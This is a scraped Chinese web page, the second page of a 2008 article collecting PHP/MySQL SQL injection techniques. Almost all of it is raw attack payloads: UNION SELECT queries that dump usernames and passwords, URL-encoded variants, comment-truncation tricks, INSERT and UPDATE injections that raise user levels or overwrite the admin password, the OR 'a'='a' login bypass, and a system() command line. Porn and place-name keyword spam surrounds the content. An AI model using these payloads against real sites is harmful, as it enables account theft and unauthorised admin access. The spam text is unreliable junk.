最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

高級(jí)php注入方法集錦第2/2頁(yè)

 更新時(shí)間:2008年07月19日 19:51:27   作者:  
不論是黑友,還是程序員,都需要了解

構(gòu)造語(yǔ)句: 

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) 

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) 

union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate 

union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate 

union %20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username ='sandflee')%20order%20by%20eventdate (查沙子的id) 

(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10) 

select * FROM article where articleid='$id' union select * FROM……(字段和數(shù)據(jù)庫(kù)相同情況下,可直接提交) 

select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(不同的情況下) 

特殊技巧:在表單,搜索引擎等地方寫(xiě): 

"___" 

".__ " 

"% 

%' ORDER BY articleid/* 

%' ORDER BY articleid# 

__' ORDER BY articleid/* 

__' ORDER BY articleid# 

$command = "dir c:\";system($command); 

select * FROM article where articleid='$id' 

select * FROM article where articleid=$id 

1' and 1=2 union select * from user where userid=1/* 句中變?yōu)?nbsp;

(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*') 

1 and 1=2 union select * from user where userid=1 

語(yǔ)句形式:建立一個(gè)庫(kù),插入: 

create DATABASE `injection` 

create TABLE `user` ( 

`userid` int(11) NOT NULL auto_increment, 

`username` varchar(20) NOT NULL default '', 

`password` varchar(20) NOT NULL default '', 

PRIMARY KEY (`userid`) 

) ; 

insert INTO `user` VALUES (1, 'swap', 'mypass'); 

插如一個(gè)注冊(cè)用戶(hù): 

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 

"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"; 

insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1') 

"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"; 

insert INTO membres SET login='',password='',nom='',userlevel='3',email='' 

"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"; 

update user SET password='$password', homepage='$homepage' where id='$id' 

update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id' 

"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"; 

update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]' 

"update news SET Votes=Votes+1, score=score+$note where idnews='$id'"; 

長(zhǎng)用函數(shù): 

DATABASE() 

USER() 

SYSTEM_USER() 

SESSION_USER() 

CURRENT_USER() 

比如: 

update article SET title=$title where articleid=1 對(duì)應(yīng)函數(shù) 

update article SET title=DATABASE() where id=1 

#把當(dāng)前數(shù)據(jù)庫(kù)名更新到title字段 

update article SET title=USER() where id=1 

#把當(dāng)前 mysql 用戶(hù)名更新到title字段 

update article SET title=SYSTEM_USER() where id=1 

#把當(dāng)前 MySQL 用戶(hù)名更新到title字段 

update article SET title=SESSION_USER() where id=1 

#把當(dāng)前 MySQL 用戶(hù)名更新到title字段 

update article SET title=CURRENT_USER() where id=1 

#把當(dāng)前會(huì)話(huà)被驗(yàn)證匹配的用戶(hù)名更新到title字段 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

$req = "select * FROM membres where name like '%$search%' ORDER BY name"; 

select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name 

select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name 

select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (經(jīng)典) 

select uid FROM admins where login='' OR admin_level=1#' AND password='' 

select * FROM table where msg like '%hop' 

select uid FROM membres where login='Bob' AND password like 'a%'#' AND password='' 

select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name

相關(guān)文章

  • PHP使用PDO創(chuàng)建MySQL數(shù)據(jù)庫(kù)、表及插入多條數(shù)據(jù)操作示例

    PHP使用PDO創(chuàng)建MySQL數(shù)據(jù)庫(kù)、表及插入多條數(shù)據(jù)操作示例

    這篇文章主要介紹了PHP使用PDO創(chuàng)建MySQL數(shù)據(jù)庫(kù)、表及插入多條數(shù)據(jù)操作,結(jié)合實(shí)例形式總結(jié)分析了php基于pdo的mysql數(shù)據(jù)庫(kù)創(chuàng)建、數(shù)據(jù)表創(chuàng)建以及多條數(shù)據(jù)插入操作相關(guān)實(shí)現(xiàn)技巧,需要的朋友可以參考下
    2019-05-05
  • 用PHP函數(shù)解決SQL injection

    用PHP函數(shù)解決SQL injection

    用PHP函數(shù)解決SQL injection...
    2006-12-12
  • PHP擴(kuò)展mcrypt實(shí)現(xiàn)的AES加密功能示例

    PHP擴(kuò)展mcrypt實(shí)現(xiàn)的AES加密功能示例

    這篇文章主要介紹了PHP擴(kuò)展mcrypt實(shí)現(xiàn)的AES加密功能,結(jié)合實(shí)例形式分析了php基于mcrypt實(shí)現(xiàn)AES加密的相關(guān)操作技巧,需要的朋友可以參考下
    2019-01-01
  • php實(shí)現(xiàn)文件上傳及頭像預(yù)覽功能

    php實(shí)現(xiàn)文件上傳及頭像預(yù)覽功能

    這篇文章主要介紹了php實(shí)現(xiàn)文件上傳及頭像預(yù)覽功能的相關(guān)資料,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2017-01-01
  • PHP實(shí)現(xiàn)下載功能的代碼

    PHP實(shí)現(xiàn)下載功能的代碼

    PHP實(shí)現(xiàn)下載功能的代碼,并實(shí)現(xiàn)安全下載,隱藏文件真實(shí)地址等,需要的朋友可以參考下
    2012-09-09
  • 最新評(píng)論

    德格县| 汉阴县| 长海县| 黔南| 桐庐县| 城口县| 桐庐县| 平罗县| 南涧| 利川市| 宁远县| 扎囊县| 和硕县| 安阳县| 永定县| 平阴县| 丰原市| 敖汉旗| 微博| 泸水县| 盐城市| 武隆县| 樟树市| 安西县| 贡山| 郑州市| 辽宁省| 准格尔旗| 乌审旗| 南汇区| 新河县| 百色市| 东平县| 嘉义市| 衡水市| 商丘市| 淮滨县| 航空| 荃湾区| 灯塔市| 碌曲县|